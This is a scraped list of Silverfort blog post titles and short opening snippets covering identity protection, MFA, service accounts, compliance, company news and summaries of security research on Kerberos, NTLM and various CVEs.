- [MFA Requirements for Elevated Access Controls](https://www.silverfort.com/blog/mfa-requirements/): Whether you are a bank, healthcare provider, or retail organization, safeguarding sensitive data is paramount. In spite of this, as...
- [Top 5 Evaluation Criteria For Choosing The Right ITDR Tool](https://www.silverfort.com/blog/top-5-evaluation-criteria-for-choosing-the-right-itdr-tool/): Identity is now a top priority for security decision makers. The need to overcome malicious TTPs, such as credential access,...
- [Exploring the Top Okta Alternatives: A 2025 Guide to Identity and Access Management Solutions](https://www.silverfort.com/blog/top-okta-alternatives/): Okta has established itself as a leader in Identity and Access Management (IAM), providing powerful user authentication and authorization across...
- [Leading Alternatives to CyberArk: Evaluating Advanced Privileged Access Management (PAM) Solutions](https://www.silverfort.com/blog/leading-alternatives-to-cyberark/): Privileged Access Management (PAM) is essential in cybersecurity, especially given that 74% of breaches involve unauthorized access to privileged accounts....
- [Duo Alternatives: Comparing Multi-Factor Authentication (MFA) Solutions for Higher Security](https://www.silverfort.com/blog/duo-alternatives/): Every organization requires a different approach to Multi-Factor Authentication (MFA). Depending on the size, complexity, and sensitivity of an organization’s...
- [Top Multi-Factor Authentication (MFA) Solutions for 2025](https://www.silverfort.com/blog/top-multi-factor-authentication-mfa-solutions/): In cybersecurity, the best defense is often layered. As attackers get smarter, so must our defenses, and no security measure...
- [The Importance of CJIS Compliance: Meeting the Identity Security Requirements of the CJIS Security Policy](https://www.silverfort.com/blog/how-silverfort-helps-law-enforcement-comply-with-advanced-authentication/): If your organization has access to sensitive data from government agencies, you will most likely have to adhere to the...
- [Introducing our Official Global Partner Program and Celebrating Leslie Bois & Amy Kowalchyk, who made CRN’s 2024 Women of the Channel List](https://www.silverfort.com/blog/introducing-our-official-global-partner-program-and-celebrating-leslie-bois-amy-kowalchyk-who-made-crns-2024-women-of-the-channel-list/): We’re so excited to share that CRN®, a brand of The Channel Company, named Silverfort’s Leslie Bois, Vice President of...
- [Identity Security in M&A: Gain Visibility into Consolidated Environments with Silverfort](https://www.silverfort.com/blog/identity-security-in-ma-gain-visibility-with-silverfort/): When a company intends to acquire another organization through a merger or purchase, it is important to know what security...
- [Silverfort Announces New Integration with Microsoft Entra ID EAM](https://www.silverfort.com/blog/silverfort-announces-new-integration-with-microsoft-entra-id-eam/): Silverfort is excited to announce our integration with external authentication methods (EAM) in Microsoft Entra ID, which is now in...
- [Using MITM to bypass FIDO2 phishing-resistant protection](https://www.silverfort.com/blog/using-mitm-to-bypass-fido2/): FIDO2 is a modern authentication group term for passwordless authentication. The Fast Identity Online (FIDO) Alliance developed it to replace...
- [Silverfort to Unveil Research at RSA 2024: Using MITM to Bypass Modern Authentication Methods to SSO](https://www.silverfort.com/blog/silverfort-to-unveil-research-at-rsa-2024/): Next week is a big week for Silverfort. Many people on our team are heading to California to attend the...
- [5 Ways to Step Up Your AD Hygiene with Silverfort](https://www.silverfort.com/blog/5-ways-to-step-up-your-ad-hygiene-with-silverfort/): Active Directory (AD) is the backbone of most organizations’ networks, managing access and authentication for users, devices and applications. While...
- [The Identity Underground Report: Deep insight into the most critical identity security gaps](https://www.silverfort.com/blog/the-identity-underground-report-deep-insight-into-the-most-critical-identity-security-gaps/): We’re proud to unveil the first report based on Silverfort’s proprietary data: The Identity Underground Report. This data, gathered and...
- [MFA Protection for Air-Gapped Networks](https://www.silverfort.com/blog/mfa-protection-for-air-gapped-networks/): The recent cyberattacks launched as part of the Russia-Ukraine warfare have reawakened concerns about the security of air gapped networks, particularly...
- [Mitigating the Identity Risks of Ex-Employees’ Accounts](https://www.silverfort.com/blog/identity-risks-of-stale-user-accounts/): One of the biggest security weaknesses organizations face is their own employees. This isn’t pleasant, but it is a reality...
- [Identity Protection Action Items Following Midnight Blizzard Attack](https://www.silverfort.com/blog/identity-protection-action-items-following-midnight-blizzard-attack/): In light of the Midnight Blizzard’s attack, it’s evident that our cybersecurity strategies must evolve to keep pace with the...
- [Silverfort Raises $116M to Unify Identity Protection](https://www.silverfort.com/blog/silverfort-raises-116m-to-lead-identity-security-market/): What a year... Despite the economic and geo-political challenges we’ve been experiencing over the last months, Silverfort has grown at...
- [Identity Segmentation: A Key Pillar in Bolstering Security Posture](https://www.silverfort.com/blog/identity-segmentation-key-in-bolstering-security-posture/): As cyber threats evolve, organizations must constantly adapt their identity security strategies to stay protected. One of the most significant...
- [Healthcare Identity Threats: Why Almost 20% of Breaches Lead to Injury](https://www.silverfort.com/blog/healthcare-identity-threats-why-almost-20-of-breaches-lead-to-injury/): The healthcare industry faces significant threats from data breaches and compromised medical devices, resulting not only in high financial losses...
- [The Clock Is Ticking on NY-DFS MFA Requirements](https://www.silverfort.com/blog/the-clock-is-ticking-on-ny-dfs-mfa-requirements/): On March 1, 2017, the Department of Financial Services enacted a regulation establishing cybersecurity requirements for financial services companies, 23...
- [Navigating Essential 8 Changes with MFA Protection and Privileged Account Security](https://www.silverfort.com/blog/navigating-essential-8-changes-with-mfa-protection-and-privileged-account-security/): In the ever-evolving landscape of cybersecurity, staying ahead of the game is not just an advantage – it’s a necessity....
- [Finding the Sweet Spot: How Donut Extortion Group Targets Achilles' Heel in Cybersecurity](https://www.silverfort.com/blog/finding-the-sweet-spot-how-donut-extortion-group-targets-achilles-heel-in-cybersecurity/): Every organization faces an ongoing battle against cybersecurity threats. Attackers are constantly looking for vulnerabilities to exploit, seeking out the...
- [Understanding MAS Regulations and the Imperative of Service Account Protection](https://www.silverfort.com/blog/understanding-mas-regulations-and-the-imperative-of-service-account-protection/): In the dynamic landscape of financial services, regulatory frameworks play a pivotal role in ensuring stability, security, and fair practices....
- [Service Account Protection Is a Necessity, not a Luxury](https://www.silverfort.com/blog/service-account-protection-is-a-necessity-not-a-luxury/): The role of service accounts in today’s complex enterprise environment cannot be overstated. These non-human or machine-to-machine (M2M) accounts are...
- [Silverfort Secures IMDA Accreditation: Setting New Standards in Identity Protection](https://www.silverfort.com/blog/silverfort-secures-imda-accreditation-setting-new-standards-in-identity-protection/): We are thrilled to announce that Silverfort was accredited by the Infocomm Media Development Authority (IMDA) in Singapore. Silverfort’s accreditation...
- [The Identity IR Playbook Against Scattered Spider Attacks](https://www.silverfort.com/blog/the-identity-ir-playbook-against-scattered-spider-attacks/): The Scattered Spider adversary group has been extremely active in the past month, increasing its outreach to financial and insurance entities....
- [How to Comply with NIS2 Directive MFA Requirements](https://www.silverfort.com/blog/comply-with-nis2-directive-mfa-requirements-with-silverfort/): In article 21, the NIS2 Directive defines the minimum set of security measures regulated entities must implement to comply with...
- [How Silverfort Empowers You to Detect and Resolve Identity Risks with Zero Effort](https://www.silverfort.com/blog/how-silverfort-empowers-you-to-detect-and-resolve-identity-risks-with-zero-effort/): When it comes to protecting organizations from compromise, what does visibility mean? It’s a word often used in the security...
- [Best IAM Tools for 2024: Secure Identity and Access Management](https://www.silverfort.com/blog/best-iam-tools/): As cyber threats become increasingly sophisticated, identity and access management (IAM) is critical for enterprises to secure their users, systems,...
- [Detecting Compromised Credentials: A Comprehensive Guide for Cybersecurity Professionals](https://www.silverfort.com/blog/detecting-compromised-credentials/): A critical and often understated security threat among cybersecurity threats is compromised credentials. With attackers increasingly targeting user login details,...
- [Open Sourcing Our Lateral Movement Detection Tool: LATMA](https://www.silverfort.com/blog/open-sourcing-our-lateral-movement-detection-tool-latma/): Collect authentication traffic from Active Directory and create a detailed report (and GIF) that outlines lateral movement patterns. Lateral movement detection...
- [How Utility Companies Can Take Advantage of FERC Incentives](https://www.silverfort.com/blog/how-silverfort-can-enable-utility-companies-take-advantage-of-ferc-incentives/): The constant evolution of cyber threats has made it much more challenging for organizations to protect their identities and secure...
- [Why AI Needs Good Governance](https://www.silverfort.com/blog/why-ai-needs-good-governance/): Throughout my career, I’ve found that one principle remains true: Although technology constantly changes, the patterns that govern it remain...
- [MGM Breach Takeaway: On-Prem Has Become Attackers’ Gateway to the Cloud](https://www.silverfort.com/blog/mgm-breach-takeaway-on-prem-has-become-attackers-gateway-to-the-cloud/): Last week, the BlackCat ransomware group (also known as ALPHV) attacked the operations of MGM Resorts and forced them to...
- [The Voice of the Identity Practitioners is Clear: Identity Protection is Broken](https://www.silverfort.com/blog/the-voice-of-the-identity-practitioners-is-clear-identity-protection-is-broken/): As an identity security practitioner, it is not news to you that the identity attack surface is exposed. You already...
- [Identity Protection Can’t be Taken for Granted Anymore](https://www.silverfort.com/blog/identity-protection-cant-be-taken-for-granted-anymore/): The findings in the report challenge the implicit trust that the purchase and deployment of an identity security solution equals protection.
- [Enterprise MFA Solutions: Securing Access at Scale](https://www.silverfort.com/blog/enterprise-mfa-solutions/): With an increasing number of data breaches and cyber attacks reported daily, multi factor authentication has become essential for any...
- [Uncovering Hidden Users: A Guide to Finding Service Accounts on Servers](https://www.silverfort.com/blog/finding-service-accounts-on-servers/): Service accounts are often overlooked users on servers and workstations that can pose serious risks if not properly managed and...
- [Top Enterprise IAM Solutions for 2024: Streamlining Identity and Access Management](https://www.silverfort.com/blog/enterprise-iam-solutions/): As cyber threats become increasingly sophisticated, identity and access management (IAM) is critical for enterprises to secure their users, systems,...
- [Attention CISOs: Closing Your Identity Protection Gaps is Urgent](https://www.silverfort.com/blog/attention-cisos-closing-your-identity-protection-gaps-is-urgent/): Here’s something that won’t be news to you: The identity-based attack surface is exposed to attacks. But what about your...
- [Time to Wake Up: The Defenses of the Identity Attack Surface are Broken](https://www.silverfort.com/blog/the-defenses-of-the-identity-attack-surface-are-broken/): Today we released the world’s first report into the identity attack surface conducted by Osterman research and commissioned by Silverfort...
- [Protecting Oil and Gas Companies from Ransomware Threats: Strengthening Air-Gapped OT Networks](https://www.silverfort.com/blog/protecting-oil-and-gas-companies-from-ransomware-threats-strengthening-air-gapped-ot-networks/): In today’s interconnected world, the cybersecurity landscape has grown increasingly complex, especially for critical industries such as oil and gas....
- [Securing Service Accounts with Silverfort](https://www.silverfort.com/blog/securing-service-accounts-with-silverfort/): Managing service accounts can be a daunting task for organizations, as service accounts are scattered across different environments and are...
- [Account Census: Creating a Complete Inventory of Service Accounts in Your Domain](https://www.silverfort.com/blog/list-all-service-accounts-in-domain/): Maintaining control and visibility over service accounts is crucial for any organization’s identity security posture management. These privileged accounts are...
- [Resolving Shadow Admins: Achieving Maximum Impact with Minimal Effort](https://www.silverfort.com/blog/resolving-shadow-admins-achieving-maximum-impact-with-minimal-effort/): Shadow Admins are non-administrative users that hold sensitive privileges which effectively grant them admin-level rights. Such privileges can include direct...
- [Much More Than a Checkbox: Cyber Insurance Can Stop Ransomware Attacks](https://www.silverfort.com/blog/cyber-insurance-can-actually-stop-ransomware-attacks/): Qualifying for a cyber insurance policy is just one more checkbox that security teams are required to tick. We’ve heard...
- [Why Ransomware Has Become a Major Identity Threat](https://www.silverfort.com/blog/why-ransomware-has-become-a-major-identity-threat/): Ransomware continues to plague organizations around the world, with more than 493.3 million attacks detected in 2022. Despite a...
- [Resolving the Identity Protection Gaps in APRA’s Resilience Assessment’s Findings](https://www.silverfort.com/blog/resolving-the-identity-protection-gaps-in-apra-resilience-assessments-findings/): The Australian Prudential Regulation Authority (APRA) recently published findings from a study examining the level of cybersecurity resilience of its...
- [How Healthcare Providers Can Gain Visibility into Their Consolidated Environments](https://www.silverfort.com/blog/how-silverfort-helps-healthcare-providers-gain-visibility-into-their-consolidated-environments/): In recent years, the healthcare industry has witnessed a notable surge in consolidation, with numerous hospitals, clinics, and healthcare providers...
- [Solving the Toughest Challenges of Privileged Access Management](https://www.silverfort.com/blog/how-silverfort-solves-the-toughest-challenges-of-privileged-access-management-pam/): The standard way of addressing security issues that stem from an organization’s privileged user accounts is with a privileged access...
- [Building an Alert System Using Snowflake](https://www.silverfort.com/blog/building-an-alert-system-using-snowflake/): During my time here at Silverfort, I was tasked with building an alert system to send messages from our Snowflake...
- [Mind the Gap! Who’s Accountable for Protecting Against Identity Threats in Your Organization?](https://www.silverfort.com/blog/mind-the-gap-whos-accountable-to-protect-against-identity-threats-in-your-organization/): Identity threats (i.e., the use of compromised credentials for malicious access to targeted resources) have become the dominant...
- [Uncovering the Trails: A Step-by-Step Guide to Tracking Service Account Usage](https://www.silverfort.com/blog/guide-to-tracking-service-account-usage/): Service accounts are powerful tools that perform important automated functions within IT systems, but they can also pose significant risks...
- [Introducing the LATMA Algorithm for Better Lateral Movement Detection](https://www.silverfort.com/blog/introducing-the-latma-algorithm-for-better-lateral-movement-detection/): Lateral movement detection is a challenge every cybersecurity researcher is likely familiar with. My team and I faced this challenge...
- [Uncovering the Hidden Risks of Mobile Device Security](https://www.silverfort.com/blog/uncovering-the-hidden-risks-of-mobile-device-security/): Organizations often encounter issues when trying to implement best practices in mobile device security while also ensuring a seamless user...
- [Protecting Against the Risk of Shadow Admins](https://www.silverfort.com/blog/how-silverfort-protects-against-the-risk-from-shadow-admins/): Shadow admins are one of the key attack surfaces that adversaries regularly take advantage of. The pattern of discovering a...
- [Applying Service Accounts Security Best Practices with Silverfort](https://www.silverfort.com/blog/applying-service-accounts-security-best-practices-with-silverfort/): Managing service accounts can be a daunting task for organizations, as service accounts are scattered across different environments and are...
- [Three Cyberattacks Where Compromised Service Accounts Played a Key Role](https://www.silverfort.com/blog/3-cyberattacks-in-which-compromised-service-accounts-played-a-key-role/): Securing service accounts is a notoriously difficult task. One of the main reasons for this difficulty is that service accounts...
- [How to Find Service Accounts in Active Directory: A Comprehensive Guide](https://www.silverfort.com/blog/how-to-find-service-accounts-in-active-directory/): Service accounts are a critical component of any enterprise environment, used to perform a variety of automated processes. However, these...
- [The Security Risks of Service Accounts: You Can't Protect What You Can’t See](https://www.silverfort.com/blog/the-security-risks-of-service-accounts-you-cant-protect-what-you-cant-see/): Service accounts play an important role in today’s enterprise environment. These non-human or machine-to-machine (M2M) accounts are used by applications,...
- [Applying Service Accounts Security Best Practices](https://www.silverfort.com/blog/service-accounts-security-best-practices/): Managing service accounts can be a daunting task for organizations, as service accounts are scattered across different environments and are...
- [Five Reasons Why Silverfort is the Perfect First Step on Your Zero Trust Journey](https://www.silverfort.com/blog/five-reasons-why-silverfort-is-the-ultimate-first-step-on-your-zero-trust-journey/): Zero Trust has traditionally been thought of in the context of a network, with implementation considered a project primarily focused...
- [Password Permutations: The Importance of Rotating Service Account Passwords](https://www.silverfort.com/blog/rotating-service-account-passwords/): Regularly rotating service account passwords is a critical cyber security best practice, yet it remains an often overlooked process in...
- [Silverfort Protection Against CVE-2023-23397 Outlook Zero Day](https://www.silverfort.com/blog/silverfort-protection-against-cve-2023-23397-outlook-zero-day/): In the latest Patch Tuesday, Microsoft released a patch for CVE-2023-23397 Zero Day in Outlook, which was reported to be...
- [Use Caution: Security Risks and Mitigation Practices Following the Collapse of SVB](https://www.silverfort.com/blog/take-caution-top-3-security-risks-and-mitigation-practices-following-svb-collapse/): The collapse of Silicon Valley Bank bears direct implications on adversaries’ activity. As always, uncertainty and panic are threat actors’...
- [MFA and Administrative Access Protection Are the Means. But to What End?](https://www.silverfort.com/blog/mfa-and-administrative-access-protection-are-the-means-but-to-what-end/): Every so often in cybersecurity it’s useful to reflect on things taken for granted and choices made — specifically why...
- [Passwords End with Passkeys](https://www.silverfort.com/blog/passwords-end-with-passkeys/): The death of passwords has been declared continuously by the security community but now it might stick with the introduction...
- [Complying with CCOP Identity Protection Requirements](https://www.silverfort.com/blog/compliance-with-ccop-identity-protection-requirements-made-easy-with-silverfort/): The Cybersecurity Code of Practice for Critical Information Infrastructure 2.0 is an enhancement of the first version that was...
- [Need an Insurance Policy Against Ransomware Attacks? Get Silverfort’s Free Identity Security Assessment](https://www.silverfort.com/blog/need-an-insurance-policy-against-ransomware-attacks-get-silverforts-free-identity-security-assessment/): Many organizations are struggling today with aligning their security controls with what underwriters now require in order to get cyber...
- [Bounce the Ticket and Silver Iodide Attacks on Azure AD Kerberos](https://www.silverfort.com/blog/bounce-the-ticket-and-silver-iodide-attacks-on-azure-ad-kerberos/): Silverfort research finds threat actors could attack new Microsoft cloud authentication protocol to steal or forge cloud tickets and carry...
- [What’s New with Silverfort’s Service Accounts Protection Capabilities](https://www.silverfort.com/blog/whats-new-with-silverforts-service-accounts-protection-capabilities/): The new year has only just begun, and thanks to the ongoing work of the Silverfort team with the help...
- [Top 5 Identity Protection Challenges for Manufacturing Companies](https://www.silverfort.com/blog/top-5-identity-protection-challenges-for-manufacturing-companies/): It is common knowledge that manufacturing is one of the most targeted verticals and that threat actors launch data theft...
- [Think You've Implemented Zero Trust? You Might Need To Think Again.](https://www.silverfort.com/blog/rethinking-your-zero-trust-implementation/): Despite becoming a bit over-marketed, zero trust is still one of the most important cybersecurity approaches for protecting your organization’s...
- [Okta’s GitHub Breach: Insights and Recommendations](https://www.silverfort.com/blog/oktas-github-breach-insights-and-recommendations/): As recently reported, Okta experienced a security breach where the source code for its workforce identity cloud was stolen....
- [Revolutionizing Work at Silverfort with ChatGPT ](https://www.silverfort.com/blog/revolutionizing-work-at-silverfort-with-chatgpt/): At Silverfort, we’re always looking for ways to improve our work and make it more efficient. Recently, we started using... - [How to Accelerate the Privileged Access Management Journey](https://www.silverfort.com/blog/how-to-accelerate-the-privileged-access-management-journey/): A robust PAM solution in place deprives threat actors of the ability to utilize compromised admin credentials for malicious access... - [The Security Risks of Service Accounts: Why Cyber Insurance Underwriters Are Tightening Requirements](https://www.silverfort.com/blog/the-security-risks-of-service-accounts-why-cyber-insurance-underwriters-are-tightening-requirements/): As ransomware attacks continue to skyrocket, both in frequency and intensity, underwriters of cyber insurance policies have been dramatically tightening... - [Cyber Insurance & MFA: 5 Things Every Broker Should Know](https://www.silverfort.com/blog/cyber-insurance-mfa-5-things-every-broker-should-know/): The surge in ransomware attacks has led leading underwriters to raise the bar for renewal or purchase of cyber insurance... - [Silverfort: Your One-Stop MFA Solution for Cyber Insurance Compliance](https://www.silverfort.com/blog/silverfort-your-one-stop-mfa-solution-for-cyber-insurance-compliance/): The past couple years have brought major changes to cyber insurance policies. Notably, almost all brokers are now requiring multi-factor... - [The MFA Blind Spot of Legacy Applications](https://www.silverfort.com/blog/the-mfa-blind-spot-of-legacy-applications/): Despite the surge over the past few years to move all resources to the cloud, the use of legacy, on-prem... 
- [Technical Analysis of CVE-2022-33679 and CVE-2022-33647 Kerberos Vulnerabilities](https://www.silverfort.com/blog/technical-analysis-of-cve-2022-33679-and-cve-2022-33647-kerberos-vulnerabilities/): Written by Yoav Iellin and Dor Segal, Researchers at Silverfort Microsoft’s September 2022 Patch Tuesday included two high-risk elevation of... - [How High Touch Technologies Renewed Their Cyber Insurance Policy](https://www.silverfort.com/blog/how-high-touch-renewed-cyber-insurance-policy/): The massive spike in ransomware attacks in 2021 – up 105% worldwide, according to SonicWall – left cyber insurance companies... - [Customer Case Study: Preventing NTLM-Based Lateral Movement with Silverfort ](https://www.silverfort.com/blog/customer-case-study-preventing-ntlm-based-lateral-movement-with-silverfort/): Since its inception, NTLM authentication protocol has been infamous for its low resiliency against attackers that seek to compromise it... - [Uber Breach Key Takeaways: Why MFA, Service Account Protection & PAM Must Work Together to Protect Against Compromised Credentials](https://www.silverfort.com/blog/uber-breach-key-takeaways-why-mfa-service-account-protection-pam-must-work-together-to-protect-against-compromised-credentials/): The recent Uber breach should be a wake-up call in rethinking about how identity protection is implemented and practiced in... - [Identity’s Role as a Strategic Risk Mitigation Tool](https://www.silverfort.com/blog/identitys-role-as-a-strategic-risk-mitigation-tool/): For large organizations operating in an uncertain world, a big picture view of risk is crucial. Understanding and addressing the... - [Privilege Escalation in Entra ID (formerly Azure AD)](https://www.silverfort.com/blog/privilege-escalation-in-azure-ad/): Privilege escalation attacks are one of the most pressing issues for security teams worldwide and are commonly used as a... 
- [Cisco Breach: A Painful Reminder of the Lateral Movement Blind Spot](https://www.silverfort.com/blog/cisco-breach-a-painful-reminder-of-the-lateral-movement-blind-spot/): No one is immune to breaches, as demonstrated last week when the networking giant Cisco reported a breach of its... - [Deadline Looms for Compliance with FTC’s Revamped Data Protection Rule](https://www.silverfort.com/blog/deadline-looms-for-compliance-with-ftcs-revamped-data-protection-rule/): On December 9 of last year, while the world braced for another wave of COVID infections, something even more serious... - [Cyber Insurance Win-Win: How Brokers Can Help Clients Comply](https://www.silverfort.com/blog/cyber-insurance-win-win-brokers-clients/): As cyberattacks continue to escalate in frequency and intensity, so do the stakes for both cyber insurance providers and their... - [Enabling Organizations to Resolve the Risks of NTLMv1](https://www.silverfort.com/blog/resolving-the-risks-of-ntlmv1/): Although a key part of cyber resilience is adapting to changes in technology, addressing attack surfaces that have remained constant... - [Silverfort Proactively Detects & Protects Against Certifried Attacks](https://www.silverfort.com/blog/silverfort-proactively-detects-protects-against-certifried-attacks/): In early May 2022, the Certifried (CVE-2022-26923) vulnerability was published. This vulnerability abuses Kerberos certificate extension and its Active Directory... - [Silverfort Raises $65M in Series C Funding](https://www.silverfort.com/blog/silverfort-raises-65m-in-series-c-funding/): We’re very excited to announce that we’ve raised $65M in Series C funding! A few words about what this milestone... - [The Okta Breach – Lessons Only the Attackers Can Teach](https://www.silverfort.com/blog/the-okta-breach-lessons-only-the-attackers-can-teach/): “There is no teacher but the enemy. No one but the enemy will tell you what the enemy is going... 
- [Protecting Against Healthcare Ransomware Attacks with MFA](https://www.silverfort.com/blog/protecting-against-healthcare-ransomware-attacks-with-mfa/): Security and data breaches are a major concern for every organization, and even more so for healthcare providers. The sensitivity... - [What Makes Lateral Movement Attacks a Blind Spot?](https://www.silverfort.com/blog/lateral-movement-attacks-blind-spot/): Lateral movement attacks are effectively a blind spot in today’s security stack, which cannot detect and prevent them in real-time.... - [Are you Ready for Stage 2 of the Log4Shell Attacks?](https://www.silverfort.com/blog/are-you-ready-for-stage-2-of-the-log4shell-attacks/): The tidal waves from the newly discovered Log4Shell zero-day attack are yet to be determined. Many organizations have hurried to... - [Monitoring for Log4j2 Exploits with Silverfort](https://www.silverfort.com/blog/monitoring-for-log4j2-exploits-with-silverfort/): Apache Log4j is an open-source, Java-based logging utility widely used by enterprise applications. The security community recently discovered a new... - [Bring Order to your Identities while Transitioning to the Cloud](https://www.silverfort.com/blog/bring-order-to-identities-while-transitioning-to-cloud/): Your enterprise is transitioning to a hybrid network. Maybe it already has. This is great news, but it also presents... - [Solving Active Directory Protection Gap with MFA for RDP, PsExec and PowerShell](https://www.silverfort.com/blog/solving-active-directory-protection-gap-with-mfa-for-rdp-psexec-and-powershell/): While transition to the cloud and digital transformation are continuously reshaping IT, Active Directory (AD) is a still a key... 
- [Ping Identity and Silverfort Unite to Deliver Identity-Centric Zero Trust](https://www.silverfort.com/blog/ping-identity-silverfort-identity-centric-zero-trust/): Ping Identity and Silverfort have joined forces to introduce a new approach of Identity-centric Zero Trust security that enables Zero... - [Rethinking Ransomware Protection](https://www.silverfort.com/blog/rethinking-ransomware-protection/): Ransomware has gradually evolved since it was first introduced in 2005. In 2013, ransomware attacks began to target the enterprise... - [Silverfort Security Advisory: NTLM Relay to AD CS – PetitPotam and Printer Bug](https://www.silverfort.com/blog/silverfort-security-advisory-petitpotam-and-printer-bug/): The PetitPotam attack, published on GitHub, causes a remote server to authenticate to a target server with NTLM, using an MS-EFSRPC... - [Silverfort Proactively Prevents Exploitation of PrintNightmare Vulnerability](https://www.silverfort.com/blog/silverfort-proactively-prevents-exploitation-of-printnightmare-vulnerability/): A vulnerability in Windows Print Spooler could allow for remote code execution as “System” by authenticated domain users on Windows... - [Prevent Automated Propagation of Ransomware Attacks](https://www.silverfort.com/blog/prevent-automated-propagation-of-ransomware-attacks/): Ransomware attacks rank high among enterprises’ cybersecurity concerns. The common practice today is to protect against the delivery and execution... - [Three Reasons the Private Sector Should Take Notice of the Cybersecurity Executive Order](https://www.silverfort.com/blog/three-reasons-private-sector-should-notice-cybersecurity-eo/): The recent Executive Order, signed by President Biden in May 2021, is a response to a series of high-profile cyberattacks... 
- [Silverfort Researchers Discover KDC Spoofing Vulnerability in F5 Big-IP [CVE-2021-23008]](https://www.silverfort.com/blog/silverfort-researchers-discover-kdc-spoofing-vulnerability-in-f5-big-ip-cve-2021-23008/): Last year we reported three Key Distribution Center (KDC) spoofing vulnerabilities in Cisco ASA, Palo Alto Networks PAN-OS and IBM... - [What is Multi Factor Authentication (MFA)?](https://www.silverfort.com/blog/what-is-multi-factor-authentication-mfa/): Multi Factor Authentication (MFA) is a security technology that is used to validate that users who authenticate with credentials are... - [Why Ending WFH Might Make Security Worse](https://www.silverfort.com/blog/why-ending-wfh-might-make-security-worse/): As COVID-19 vaccine rollouts pick up steam, it’s time to start thinking about the day after, and how a possible... - [Hafnium Microsoft Exchange Zero Days Expose Admin Access as a Critical Attack Surface](https://www.silverfort.com/blog/hafnium-microsoft-exchange-zero-days-admin-access-critical-attack-surface/): Microsoft has recently disclosed that four zero-day vulnerabilities in Microsoft Exchange Server are actively being exploited in the wild by... - [Consolidating Your Hybrid IAM on Microsoft Entra ID (formerly Azure AD)](https://www.silverfort.com/blog/consolidating-your-hybrid-iam-on-microsoft-azure-ad/): Modern enterprise IT environments are highly diverse and include many different assets, from legacy IT infrastructure to modern cloud workloads.... - [It's Time for Unified Identity Protection](https://www.silverfort.com/blog/its-time-for-unified-identity-protection/): *****By Hed Kovetz, CEO and Co-Founder, Silverfort***** Identity-based attacks, which use compromised credentials to access enterprise resources, continue to grow... 
- [Service Accounts Likely Played a Key Role in the SunBurst Attack](https://www.silverfort.com/blog/service-accounts-key-role-in-sunburst-attack/): ***** By Gal Sadeh, Lead Data Scientist, Silverfort ***** Research we have conducted at Silverfort Labs indicates that service accounts... - [The Pay2Key APT Campaign – Why Identity Protection is Needed more than Ever](https://www.silverfort.com/blog/why-identity-protection-is-needed-more-than-ever/): The Pay2Key attacks have targeted leading enterprises in the past couple of months with various ransomware, extortion and data theft... - [Silverfort Revolutionizes Protection Against Lateral Movement with MFA – Reflections on the SolarWinds Attack](https://www.silverfort.com/blog/silverfort-revolutionizes-protection-against-lateral-movement-with-mfa/): *****By https://www. silverfort. com/wp-content/uploads/2022/06/Thumbnails-for-Resources-and-blog-green_0001s_0001_Generic1-Archive-card-842x626px-24. png Keshet, Director of Product Marketing, Silverfort ***** MFA prevents 99. 9% of account compromise. However,... - [Silverfort Protection Against the Bronze Bit CVE-2020-17049 Exploit – Update](https://www.silverfort.com/blog/silverfort-bronze-bit-cve-2020-17049/): On December 8, the new Bronze Bit exploit of CVE-2020-17049 Kerberos vulnerability was made public, adding another cutting-edge weapon to... - [Delegation Threats: Deep Dive into Microsoft Patch of CVE-2020-17049 KCD Vulnerability](https://www.silverfort.com/blog/delegation-treats-cve-2020-17049/): *****By Dor Segal, Security Researcher at Silverfort***** On November 11, 2020 Microsoft disclosed CVE-2020-17049, a new Kerberos Security Feature Bypass... - [FunnyDream APT Campaign – Zoom in on Silverfort Protection Against Lateral Movement](https://www.silverfort.com/blog/funnydream-apt-campaign-lateral-movement/): *****By https://www. silverfort. com/wp-content/uploads/2022/06/Thumbnails-for-Resources-and-blog-green_0001s_0001_Generic1-Archive-card-842x626px-24. 
png Keshet, Director of Product Marketing, Silverfort***** A new APT campaign, dubbed ‘FunnyDream’, has been discovered... - [Third KDC Spoofing Vulnerability Identified by Silverfort Researchers – This Time In IBM QRadar [CVE-2019-4545]](https://www.silverfort.com/blog/third-kdc-spoofing-ibm-qradar-cve-2019-4545/): *****By Yoav Iellin, Yaron Kassner, Dor Segal & Rotem Zach, Silverfort***** KDC spoofing never gets old. We’ve disclosed KDC spoofing... - [ZeroLogon – Patching is Not Enough](https://www.silverfort.com/blog/zerologon-patching-is-not-enough/): Guidelines and Tools for Protecting Your Environment from CVE-2020-1472 By Yaron Kassner, CTO and Co Founder, Silverfort Secura recently published... - [ZeroLogon – Patching is Not Enough](https://www.silverfort.com/blog/zerologon-patching-is-not-enough-2/): Guidelines and Tools for Protecting Your Environment from CVE-2020-1472 By Yaron Kassner, CTO and Co Founder, Silverfort Secura recently published... - [Silverfort Researchers Discover an Authentication Bypass Vulnerability in Palo Alto Networks PAN-OS [CVE-2020-2002]](https://www.silverfort.com/blog/silverfort-researchers-panw-pan-os-cve-2020-2002/): Palo Alto Networks published an advisory about a KDC-spoofing vulnerability in PAN-OS that was discovered and responsibly disclosed to Palo... - [Silverfort Researchers: Kerberos Exploit Can Bypass Authentication to Cisco ASA [CVE-2020-3125]](https://www.silverfort.com/blog/cisco-vulnerability-cve-2020-3125-2/): Security researchers at Silverfort, provider of agentless authentication platform, identified a severe vulnerability that can enable hackers to gain control... - [Silverfort Researchers Discover an Authentication Bypass Vulnerability in Palo Alto Networks PAN-OS [CVE-2020-2002]](https://www.silverfort.com/blog/silverfort-researchers-panw-pan-os-cve-2020-2002-2/): Palo Alto Networks published an advisory about a KDC-spoofing vulnerability in PAN-OS that was discovered and responsibly disclosed to Palo... 
- [Silverfort Researchers: Kerberos Exploit Can Bypass Authentication to Cisco ASA [CVE-2020-3125]](https://www.silverfort.com/blog/cisco-vulnerability-cve-2020-3125/): Security researchers at Silverfort, provider of agentless authentication platform, identified a severe vulnerability that can enable hackers to gain control... - [The State of the Identity Attack Surface: Insights into Critical Protection Gaps](https://www.silverfort.com/blog/post-test/): Executive Summary This survey discloses a critical gap in organizations’ ability to protect themselves against identity threats—with 83% already having... - [The Hidden Dangers of Shadow Admins](https://www.silverfort.com/blog/the-hidden-dangers-of-shadow-admins/): Shadow Admin accounts are user accounts that have sensitive privileges – not because they are members of a privileged admin... - [The Hidden Dangers of Shadow Admins](https://www.silverfort.com/blog/the-hidden-dangers-of-shadow-admins-2/): Shadow Admin accounts are user accounts that have sensitive privileges – not because they are members of a privileged admin... - [Silverfort Named Winner of the PCI 2020 Awards for Excellence](https://www.silverfort.com/blog/silverfort-named-winner-of-the-pci-2020-awards-for-excellence/): Silverfort has been named a winner of the PCI 2020 Awards for Excellence at this year’s 